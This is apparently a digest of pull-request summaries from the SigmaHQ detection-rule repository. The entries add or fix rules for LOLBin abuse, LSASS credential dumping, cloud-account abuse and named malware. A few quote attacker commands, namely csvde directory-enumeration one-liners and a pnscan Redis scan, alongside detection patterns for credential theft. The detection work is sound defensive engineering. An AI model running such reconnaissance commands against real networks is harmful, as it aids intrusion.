rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml, rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml, rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml, rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml, rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml, rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml, rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml, rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml, rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml, rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml, rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml, rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml, rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml, rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml
This PR updates ATT&CK tagging for multiple rules
chore: update ATT&CK tagging for multiple rules
N/A
N/A
=> Update ATT&CK Mapping For Some Rules

rules/windows/dns_query/dns_query_win_onelaunch.yml, rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml
Tracks dns queries to the update endpoint for OneLaunch that originate from the OneLaunch client.
new: DNS Query Request To OneLaunch Update Service
(sorry I only have cs logs, but the fieldnames should match Sysmon logs)
N/A
=> Windows DNS Query to OneLaunch update service

rules-emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml, rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml, rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml, rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml, rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml, rules/windows/process_creation/proc_creation_win_lolbin_setres.yml, rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml, rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml, rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml
This PR aims to refactor conditions in order to follow the standard
chore: refactor the `condition` field to align with the standard
N/A
N/A
=> Refractor 1/all of Condition unique 

rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml
Adding rule to detect threat actor signing into the console leveraging GetSigninToken allowing them to create temporary federated credentials using aws_consoler.
new: AWS Console GetSigninToken Potential Abuse
```json
{
"eventVersion": "1.08",
"userIdentity": {
"type": "AssumedRole",
"principalId": "NOTREALUU4MH7OYK5ZCOA:CompromisedRole",
"arn": "arn:aws:sts::123456789012:assumed-role/roleName/CompromisedRole",
"accountId": "123456789012",
"accessKeyId": "originalAccessKeyID",
"sessionContext": {
"sessionIssuer": {
"type": "Role",
"principalId": "NOTREALUU4MH7OYK5ZCOA",
"arn": "arn:aws:iam::123456789012:role/CompromisedRole",
"accountId": "123456789012",
"userName": "CompromisedRole"
},
"webIdFederationData": {},
"attributes": {
"creationDate": "2024-02-20T20:30:00Z",
"mfaAuthenticated": …
```
=> New Rule for AWS GetSigninToken Abuse

rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml
Increase coverage of `7b582f1a-b318-4c6a-bf4e-66fe49bf55a5` based on https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
update: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution - Add more potential child process seen in the wild
N/A
N/A
=> Increase Coverage For SC Related Rule

rules/windows/process_access/proc_access_win_lsass_memdump.yml
Remove a selection for the LSASS memory dump rule that was prone to FPs.
fix: Potential Credential Dumping Activity Via LSASS - remove legitimate access mask
```
Feb 26 06:38:06 win-8-s1ci-02
AURORA: Notice
MODULE: Sigma
MESSAGE: Sigma match found
RULE_TITLE: Potential Credential Dumping Activity Via LSASS
RULE_AUTHOR: Samir Bousseaden, Michael Haag
RULE_DESCRIPTION: "Detects process access requests to the LSASS process with specific call trace calls and access masks.\nThis behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.\n"
RULE_FALSEPOSITIVES: Unknown
RULE_ID: 5ef9853e-4d0e-4a70-846f-a9ca37d876da
RULE_LEVEL: medium
RULE_MODIFIED: 2023/12/13
RULE_PATH: 3\134.yms
RULE_REFERENCES: …
```
=> Fix FP in proc_access_win_lsass_memdump.yml

rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml
Adding a new optional filter to the rule `Remote Thread Creation In Uncommon Target Image` to exclude calls from the Xerox Print Job Event Manager Service to spoolsrv.
fix: Remote Thread Creation In Uncommon Target Image - add optional filter for the Xerox Print Job Event Manager Service calling spoolsrv
```
SourceImage: C:\Program Files\Xerox\XeroxPrintExperience\CommonFiles\XeroxPrintJobEventManagerService.exe
StartFunction: LoadLibraryW
TargetImage: C:\Windows\System32\spoolsv.exe
```
N/A
=> New Filter for Remote Thread Creation In Uncommon Target Image

rules-threat-hunting/windows/registry/registry_set/registry_set_shell_context_menu_tampering.yml, rules/windows/registry/registry_set/registry_set_sentinelone_shell_context_tampering.yml
This PR adds 2 new rules based on information from this blog - https://mrd0x.com/sentinelone-persistence-via-menu-context/
new: Shell Context Menu Command Tampering
new: Potential SentinelOne Shell Context Menu Scan Command Tampering
N/A
N/A
=> New Rules: Shell Context Menu Command Tampering

rules-emerging-threats/2024/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_rundll32_shell32_cpl_exection.yml, rules-emerging-threats/2024/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_shell32_cpl_file_exection.yml
Added new rule for related behavior observed in Raspberry Robin variants
I have seen these patterns consistently in the new variants of raspberry robin
More sample can be found here: https://bazaar.abuse.ch/browse/signature/RaspberryRobin/
new: Potential Raspberry Robin CPL Execution Activity
```
EventID:1
Product:Microsoft\xae Windows\xae Operating System
Company:Microsoft Corporation
ParentImage:C:\Windows\SysWOW64\control.exe
FileVersion:10.0.17134.1 (WinBuild.160101.0800)
CurrentDirectory:C:\Users\george\AppData\Local\Temp\
Image:C:\Windows\SysWOW64\rundll32.exe
IntegrityLevel:High
ParentCommandLine:"C:\Windows\System32\control.exe" "C:\Users\george\AppData\Local\Temp\_d8c4M1.CPL",
Hashes:SHA1=BCC5DC3222034D3F257F1FD35889E5BE90F09B5F,MD5=D7CA562B0DB4F4DD0F03A89A1FDAD63D,SHA256=4E15AA13 …
```
=> Potential Raspberry Robin CPL Execution Activity

rules/network/zeek/zeek_http_webdav_put_request.yml, rules/network/zeek/zeek_rdp_public_listener.yml, rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml, rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml, rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml, rules/windows/network_connection/net_connection_win_dllhost_non_local_ip.yml, rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml, rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml, rules/windows/network_connection/net_connection_win_script_wan.yml, rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml, rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml, rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml, rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml
This PR switch rules to using the `cidr` modifier.
chore: update multiple rules to use the `cidr` modifier
N/A
N/A
=> chore: use CIDR modifier

.github/workflows/sigma-validation.yml, tests/validate-sigma-schema/validate.py, tests/validate-sigma-schema/validate.sh
Based on the suggestion by @nasbench I updated the validation bash script to be portable across this project and the GitHub action I created:
- https://github.com/SigmaHQ/sigma/discussions/4723
- https://github.com/marketplace/actions/validate-sigma-rules
- https://github.com/mostafa/validate-sigma-rules
- https://github.com/mostafa/validate-sigma-rules-example
After merging this PR, I'll update the action to download the script before running it, so that the action is just a downloader for the script and the schema. The script behaves the same as before, as in it enumerates all the rules from all the directories that are now explicitly set in the environment variables instead of the script and validates whether they conform to the existing Sigma JSON schema or not.
Note: I can update the …
=> Update validate script

rules-emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml, rules-threat-hunting/windows/network_connection/net_connection_win_dfsvc_non_local_ip.yml, rules-threat-hunting/windows/network_connection/net_connection_win_powershell_network_connection.yml, rules/network/zeek/zeek_http_webdav_put_request.yml, rules/network/zeek/zeek_rdp_public_listener.yml, rules/web/proxy_generic/proxy_webdav_search_ms.yml, rules/windows/network_connection/net_connection_win_dllhost_non_local_ip.yml, rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml, rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml, rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml, rules/windows/network_connection/net_connection_win_script_wan.yml, rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml, rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml, rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml, rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml, rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
This PR updates additional rules to use the `cidr` modifier.
Note: The MS range was calculated using `ipinfo.io`.
update: Communication To Uncommon Destination Ports - Add link-local address range
update: Dfsvc.EXE Network Connection To Non-Local IPs - Update rule to use `cidr` modifier
update: Microsoft Sync Center Suspicious Network Connections - Add link-local address range
update: Network Connection Initiated By PowerShell Process - Update rule to use `cidr` modifier
update: Office Application Initiated Network Connection To Non-Local IP - Update rule to use `cidr` modifier
update: Outbound Network Connection To Public IP Via Winlogon - Add link-local address range
update: Potential CVE-2023-23397 Exploitation Attempt - SMB - Update rule to use `cidr` modifier
update: Potentially …
=> Update additional rules to use the `cidr` modifier

.github/workflows/goodlog-tests.yml, .github/workflows/pr-labeler.yml, .github/workflows/ref-archiver.yml, .github/workflows/sigma-rule-promoter.yml, .github/workflows/sigma-test.yml
Update workflows action version
chore:  update workflows action version
N/A
N/A
=> Chore : update workflows action version

.github/workflows/sigma-validation.yml, tests/validate-sigma-schema/validate.py
While trying to test the Validate Sigma Rule [action](https://github.com/SigmaHQ/validate-sigma-rules), I found that traversing symlinks might [result in `PermissionError`](https://github.com/mostafa/validate-sigma-rules-example/actions/runs/8266813617/job/22615724589) being raised if the resulting file is inaccessible. So, the script for getting rules should either be run using `sudo` or the file will be ignored. This is especially true with GitHub action runners, where a lot of docker in docker and other behind the scenes activities are happening.
chore: Add comment to the code
chore: Ignore inaccessible file
chore: Switch to using the action for validating Sigma rules
`PermissionError: Could not access {path}, skipping file`
N/A
- If your PR adds new rules, please consider following …
=> Fix permission error

.github/workflows/sigma-validation.yml, tests/validate-sigma-schema/validate.py
This PR fixes an issue where caused the validate-sigma-rules workflow to enumerate everything, rather than the chosen paths, as reported [here](https://github.com/SigmaHQ/sigma/actions/runs/8295480273/job/22702594320?pr=4771).
These commits are related to this change:
- https://github.com/SigmaHQ/validate-sigma-rules/commit/6dd54ae51f2b3a5767b28d2ae1adc9957da6f860
- https://github.com/SigmaHQ/validate-sigma-rules/commit/7f86bac40053f2efadc94047c0957901f07898e2
@nasbench 
@phantinuss 
@frack113
- update: Update action to pass inputs to the validate-sigma-rules action, rather than setting env-vars.
- fix: Remove `ROOT_DIR` that was referring to the GITHUB_ACTION_PATH, rather than the GITHUB_WORKSPACE.
N/A
N/A …
=> Fix path errors

rules-threat-hunting/windows/process_creation/proc_creation_win_diskshadow_script_mode.yml, rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml, rules/windows/process_creation/proc_creation_win_lolbin_replace.yml, rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml, rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml, rules/windows/process_creation/proc_creation_win_msiexec_dll.yml, rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml, rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml, rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml, rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml, rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml, rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml, rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml, rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml, rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml, rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml, rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml, rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml, rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml, rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml, rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml, rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml, rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml
Update rules with `windash`
update: Diskshadow Script Mode Execution - Update rule to use the `windash` modifier
update: IIS Native-Code Module Command Line Installation - Update rule to use the `windash` modifier
update: Replace.exe Usage - Update rule to use the `windash` modifier
update: Potential Arbitrary Command Execution Using Msdt.EXE - Update rule to use the `windash` modifier
update: Suspicious Cabinet File Execution Via Msdt.EXE - Update rule to use the `windash` modifier
update: DllUnregisterServer Function Call Via Msiexec.EXE - Update rule to use the `windash` modifier
update: Suspicious Msiexec Execute Arbitrary DLL - Update rule to use the `windash` modifier
update: Msiexec Quiet Installation - Update rule to use the `windash` modifier
update: Suspicious Msiexec Quiet …
=> Update rules with windash modifier

.github/workflows/sigma-validation.yml
The previous action on my own account was published and later unpublished after donating the repo to Sigma HQ. Now, we can't publish with the same name anymore, because GH is returning 500 error screen with no explanation. I tried GH support, but so far no luck. @nasbench and I decided to change the name of the repo and try to publish it under a different name, hence I am raising this PR.
- update: change action name to sigma-rules-validator
N/A
Already explained in the description.
=> Change action name to sigma-rules-validator to avoid conflict when publishing on GH marketplace

rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml, rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml, rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml, tests/rule-references.txt
Fix 2 links to elastic homepage in rules-files
chore: fix some broken reference links
N/A
N/A
=> fix links to elatic-homepage in rules-files

rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml, rules/windows/network_connection/net_connection_win_susp_external_ip_lookup.yml
My bad, for shorter ones we need the exact queryname now that we don't use contains, `l2.io` is ok
update: Suspicious DNS Query for IP Lookup Service APIs - Fix ip.cn
update: Suspicious Network Connection to IP Lookup Service APIs - Fix ip.cn
`<Data Name="QueryName">www.ip.cn</Data><Data Name="QueryStatus">0</Data><Data Name="QueryResults">::ffff:172.67.174.23;::ffff:104.21.64.12;</Data>`
=> Minor fix for ip lookup rule

rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml
The loading happens automatically on systems with active WinRM connections without special interaction towards VSS.
update: Suspicious Volume Shadow Copy VSS_PS.dll Load - regularly loaded by wsmprovhost.exe
=> fix: being loaded by wsmprovhost.exe

rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml
fix: add filter for automatic execution of a policy test for PowerShell AppLocker lockdown mode
fix: Windows Binaries Write Suspicious Extensions - filter PS1 policy check for AppLocker mode
=> fix: filter PS1 policy check for AppLocker mode

rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml
fix: Dynamic .NET Compilation Via Csc.EXE - FP with cocolatey
=> fix: FP with chocolatey shimgen tool

rules-emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml
Removed https://embedi[.]com/ link as it points to a Malaysian casino page now, added a different short blog and the github PoC.
This is related to https://github.com/SigmaHQ/sigma/pull/4804 , just had to update my fork first.
fix: Droppers Exploiting CVE-2017-11882 - updated references
Removed old/incorrect reference, replaced with two correct/working ones.
=> Fix references in proc_creation_win_exploit_cve_2017_11882.yml #4804

rules/windows/process_creation/proc_creation_win_csvde_export.yml
Update reference and tags from https://redcanary.com/blog/msix-installers/
```bash
csvde.exe -r "(&(objectClass=Computer))" -l samAccountName,description,IPv4Address,info,operatingSystem -f 01cp.txt
csvde.exe -r "(&(objectCategory=person)(objectClass=User))" -l samAccountName,description,info,mail,middleName,displayName,title,department,lastLogon -f 01usr.txt
```
=> Update references and tags

rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml
Fixes a false positives reported in #4812
Try many tests on windows 11 , can only get the commandline with `cmd /c "dir"`
fix: File And SubFolder Enumeration Via Dir Command - Fix false positive with firefox and similar CLI apps.
```
2019-05-21 09:35:12.705 +09:00 · File Enumeration Via Dir Command · low · IEWIN7 · Sysmon · 1 · Disc · T1217 · · 386 · Cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3168.20.1502540827\1989220046" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 3168 …
```
=> Add Image to avoid FP

rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml
Add FP when use ps1 or bat in the startup machine GPO
fix: Windows Binaries Write Suspicious Extensions - Add new filter for when "bat" or "powershell" scripts are written via GPO  to run at startup.
```
File created: RuleName: T1165 UtcTime: redacted ProcessGuid: {ea5c891b-3d3b-63c3-9320-000000001500} ProcessId: 9308 Image: C:\Windows\system32\svchost.exe TargetFilename: C:\Windows\System32\GroupPolicy\DataStore\0\sysvol\redacted\Policies\{uuid redacted}\Machine\Scripts\Startup\redacted.bat CreationUtcTime: redacted
File created: RuleName: T1165 UtcTime: redacted ProcessGuid: {ea5c891b-3d3b-63c3-9320-000000001500} ProcessId: 9308 Image: C:\Windows\system32\svchost.exe TargetFilename: C:\Windows\System32\GroupPolicy\DataStore\0\sysvol\redacted\Policies\{uuid …
```
=> FP Bad practice GPO 

tests/test_rules.py
=> correct the error message and variable name in test_rules.py

tests/test_logsource.py
=> fix a typo in test_logsource.py

rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml
I found invalid slash in `ServiceDll Hijack` rule, so I fixed it.
Thank you for your time :)
fix:	ServiceDll Hijack - remove invalid slash
N/A
N/A
=> fix: remove invalid slash in `ServiceDll Hijack` rule

rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml
I noticed that  `{` was not escaped in yml `|re` block.
This will cause regex compilation errors in programming languages ​​such as Rust, Java and .NET, So I escaped `{` explicitly.
- ref: https://github.com/SigmaHQ/sigma/pull/3737
fix:	Invoke-Obfuscation Via Stdin - explicitly escape { to make it clear that it is a literal
N/A
=> fix: explicitly escape `{` to make it clear that it is a literal

rules/linux/builtin/lnx_shell_clear_cmd_history.yml, rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml
I've created a new linux detector that detects the use of the FOSS Network Scanner [pnscan](https://github.com/ptrrkssn/pnscan). This activity has been observed by threat actors recently based on this intel: https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence
Specifically it was observed that the TA executed: `/usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 221[.]0[.]0[.]0/16 6379`
This Sigma rule detects the the CLI pattern of `-R` or -`W` followed by hex characters (optionally preceeded by `"` as the tool documentation slightly differs from the intel, this pattern will match both)
Regex tested - https://regex101.com/r/RugQYK/1
new:	 Pnscan Binary Data …
=> Pnscan rule creation

rules-emerging-threats/2024/TA/Forest-Blizzard/README.md, rules-emerging-threats/2024/TA/Forest-Blizzard/file_event_win_apt_forest_blizzard_activity.yml, rules-emerging-threats/2024/TA/Forest-Blizzard/file_event_win_apt_forest_blizzard_constrained_js.yml, rules-emerging-threats/2024/TA/Forest-Blizzard/proc_cration_win_apt_forest_blizzard_activity.yml, rules-emerging-threats/2024/TA/Forest-Blizzard/proc_creation_win_apt_forest_blizzard_activity.yml, rules-emerging-threats/2024/TA/Forest-Blizzard/registry_set_apt_forest_blizzard_custom_protocol_handler.yml, rules-emerging-threats/2024/TA/Forest-Blizzard/registry_set_apt_forest_blizzard_custom_protocol_handler_dll.yml
This PR adds rule based on MSFT [report](https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/)
new: Forest Blizzard APT - Custom Protocol Handler Creation
new: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set
new: Forest Blizzard APT - File Creation Activity
new: Forest Blizzard APT - JavaScript Constrained File Creation
new: Forest Blizzard APT - Process Creation Activity
N/A
N/A
=> feat: add forest blizzard rules

rules-emerging-threats/2024/Exploits/CVE-2024-3400/paloalto_globalprotect_os_command_injection.yml, tests/logsource.json, tests/thor.yml
=> feat: add rule CVE-2024-3400

rules/windows/network_connection/net_connection_win_regasm_network_activity.yml
Add a rule to detect regasm.exe network connection.
Limit to SMTP as I can not check FP 
new: Network Connection Initiated By RegAsm.EXE
Rule from online sandbox
=> Add Network Connection Initiated By RegAsm.EXE

rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml
Fix false positive reported
fix: ADS Zone.Identifier Deleted By Uncommon Application - Filter out "chrome" and "firefox" processes.
N/A
Fixes #4820
=> fix: #4820

.github/workflows/sigma-test.yml, tests/sigma_cli_conf.yml, tests/test_rules.py
Use pySigma-validators-sigmahq 0.5.2 to remove useless test in test_rules.py
Do not use the validators: 
- sigmahq_logsource_coherent
- sigmahq_logsource_known
- sigmahq_fieldname_cast
- sigmahq_filename_prefix
chore: Use pySigma-validators-sigmahq in the workflow
=> Update test Workflow

rules/windows/file/file_access/file_access_win_browser_credential_access.yml, rules/windows/file/file_access/file_access_win_outlook_mail_credential_access.yml
Add Access To Windows Outlook Mail Files By Uncommon Application rule
I used `file_access` to detect any way  malware exe, ps, vbs, cmd...
new: Access To Windows Outlook Mail Files By Uncommon Application
```xml
<Data>Sigma rule match found: Access To Windows Outlook Mail Files By Uncommon Application (see Details tab for more information)</Data> 
<Data>Module: Sigma</Data> 
<Data>Rule_Title: Access To Windows Outlook Mail Files By Uncommon Application</Data> 
<Data>Rule_Author: frack113</Data> 
<Data>Rule_Description: Detects file access requests to Windows Outlook Mail by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage</Data> 
<Data>Rule_FalsePositives: Antivirus, Anti-Spyware, Anti-Malware Software, Backup software, …
```
=> Rule: Access To Windows Outlook Mail Files By Uncommon Application

rules-emerging-threats/2024/TA/Forest-Blizzard/proc_creation_win_apt_forest_blizzard_activity.yml
Rule match on all `Get-ChildItem` without the `|all`
update: Forest Blizzard APT - Process Creation Activity
=> Fix FP Forest-Blizzard/proc_creation_win_apt_forest_blizzard_activity

rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml
Removed smart quotes from title of rule which were causing the payload to bomb out when sending to Microsoft Sentinel as a detection rule template
fix: Malicious DLL File Dropped in the Teams or OneDrive Folder - Remove smart quotes 
=> Remove smart quotes from file_event_win_iphlpapi_dll_sideloading.yml

rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml
Hi team,
I noticed that [azure_aad_secops_ca_policy_updatedby_bad_actor.yml](https://github.com/SigmaHQ/sigma/blob/6a5cf5c37c5c8aba2c810b3b2bdbfbd6bc262bfb/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml) uses a list (keywords) to detect when a conditional access policy has been modified, while similar rules such as [azure_aad_secops_ca_policy_removedby_bad_actor.yml](https://github.com/SigmaHQ/sigma/blob/6a5cf5c37c5c8aba2c810b3b2bdbfbd6bc262bfb/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml) use a map (selection).
This is a simple PR to update [azure_aad_secops_ca_policy_updatedby_bad_actor.yml](https://github.com/SigmaHQ/sigma/blob/6a5cf5c37c5c8aba2c810b3b2bdbfbd6bc262bfb/rules/cloud/azure/audit_logs/azure_aad_secops_ca_pol …
=> Refactor azure_aad_secops_ca_policy_updatedby_bad_actor.yml to use a map of fields

rules/macos/process_creation/proc_creation_macos_tmutil_backup_tampering.yml, rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml, rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml, rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml
Added a new rule to detect tampering with Time Machine, Apple's automated backup utility software. Attackers can use this to prevent backups from occurring and hinder the victim's ability to recover from any damage.
new: Time Machine Backup Deletion Attempt Via Tmutil - MacOS
new: Time Machine Backup Disabled Via Tmutil - MacOS
new: New File Exclusion Added To Time Machine Via Tmutil - MacOS
=> Create new rule: proc_creation_macos_tmutil_backup_tampering.yml

README.md
Fixing a broken link in Projects or Products that use or integrate Sigma rules section of readme
update: fixing broken link
=> fixing sigma2stix urls in projects section

rules/windows/process_creation/proc_creation_win_reg_enable_windows_recall.yml, rules/windows/registry/registry_delete/registry_delete_enable_windows_recall.yml, rules/windows/registry/registry_set/registry_set_enable_windows_recall.yml
This pull request features three new Sigma rules that detect the activation of Windows Recall, through a combination of registry changes, or through the use of `reg.exe`. While an attack scenario has yet to be observed or documented, the rules have been developed proactively to detect the activation of Windows Recall in an environment where the feature has been explicitly disabled. It is hypothesised that an attacker could enable Windows Recall as part of post-exploitation discovery, collection and exfiltration activities.
new: Windows Recall Feature Enabled Via Reg.EXE
new: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
new: Windows Recall Feature Enabled - Registry
The sigma rules can be validated by running the following commands in an elevated command-prompt:
``` …
```
=> New: Detect Activation of Windows Recall

rules/category/antivirus/av_hacktool.yml, rules/category/antivirus/av_password_dumper.yml, rules/windows/builtin/application/Other/win_av_relevant_match.yml
Shorten AV string "Mimikatz" to "mikatz" because of "HackTool:Win32/Mikatz"
Microsoft also uses HackTool:Win32/Mikatz, e.g.
1b441fde04d361a6fd7fbd83e969014622453c263107ce2bed87ad0bff7cf13f
update: Antivirus Hacktool Detection - Add the string "mikatz" because of "HackTool:Win32/Mikatz"
update: Antivirus Password Dumper Detection - Add the string "mikatz" because of "HackTool:Win32/Mikatz"
update: Relevant Anti-Virus Signature Keywords In Application Log - Add the string "mikatz" because of "HackTool:Win32/Mikatz"
=> Shorten AV string "Mimikatz" to "mikatz" 

rules/cloud/okta/okta_new_behaviours_admin_console.yml
When testing the Okta rules against sample Okta log data, I identified issues with the rule that detects new behaviors on Admin Console accesses, due to the data being structured differently to my original assumptions. I also noted that my original description was not accurate and that the level of the rule was lower than (I think) it should be, based on the detection conditions.
update: Okta New Admin Console Behaviours - update to reflect Okta log data structure
This was causing false negatives, not false positives. An example behavior is structured as follows:
```json
"behaviors":"{New Geo-Location=NEGATIVE, New Device=NEGATIVE, New IP=NEGATIVE, New State=NEGATIVE, New Country=NEGATIVE, Velocity=NEGATIVE, New City=NEGATIVE}"
```
- If your PR adds new rules, please consider following …
=> Update New Behaviours Okta Admin Console rule

rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml
Just a small change to address a typo in one of the Azure rule descriptions:
"authencaition" should be "authentication"
fix: Suspicious SignIns From A Non Registered Device - fixed typo
N/A
N/A
=> Fixed typo (authencaition) in Suspicious SignIns From A Non Registered Device

rules/cloud/aws/cloudtrail/aws_enum_buckets.yml
AWS Enum Buckets rule references the field `type`, but there is no such field in AWS Cloudtrail data. The `eventType` does not appear to contain `AssumedRole`, but it does appear in `userIdentity.type`, which is referenced in other Sigma rules and would make more sense in this context.
fix: Potential Bucket Enumeration on AWS
```json
{"additionalEventData":{},"awsRegion":"ap-southeast-1","eventCategory":"Management","eventID":"xxxx","eventName":"ListBuckets","eventSource":"s3.amazonaws.com","eventTime":"xxxx","eventType":"AwsApiCall","eventVersion":"xxxx","managementEvent":true,"readOnly":true,"recipientAccountId":"xxxx","requestID":"xxxx","requestParameters":{"Host":"s3.ap-southeast-1.amazonaws.com"},"responseElements":null,"sourceIPAddress":"xxxx","tlsDetails":{},"userAgent":"xxxx","user …
```
=> Use `userIdentity.type` for AssumedRole in AWS Enum Buckets

.github/workflows/sigma-test.yml, rules-emerging-threats/2024/Malware/kapeka/registry_set_malware_kapeka_backdoor_autorun_persistence.yml, rules/compliance/netflow_cleartext_protocols.yml, rules/windows/process_creation/proc_creation_win_node_abuse.yml, tests/sigma_cli_conf.yml
This PR updates the validator to latest version and fixes the issues
chore: update `pySigma-validators-sigmahq` to version 0.7.0 and update `sigma_cli_conf.yml`
N/A
N/A
=> Fix validators issues

rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml, rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml, rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml, rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml, rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml
Introduces rules for detecting potential attacks against Kubernetes, identified within the audit log. Many of these rules are derived from existing rules for GCP/Azure, but these rules have been written to work on the generic audit log format produced by K8s itself.
new: Kubernetes Admission Controller Modification
new: Kubernetes CronJob/Job Modification
new: Kubernetes Rolebinding Modification
new: Kubernetes Secrets Modified or Deleted
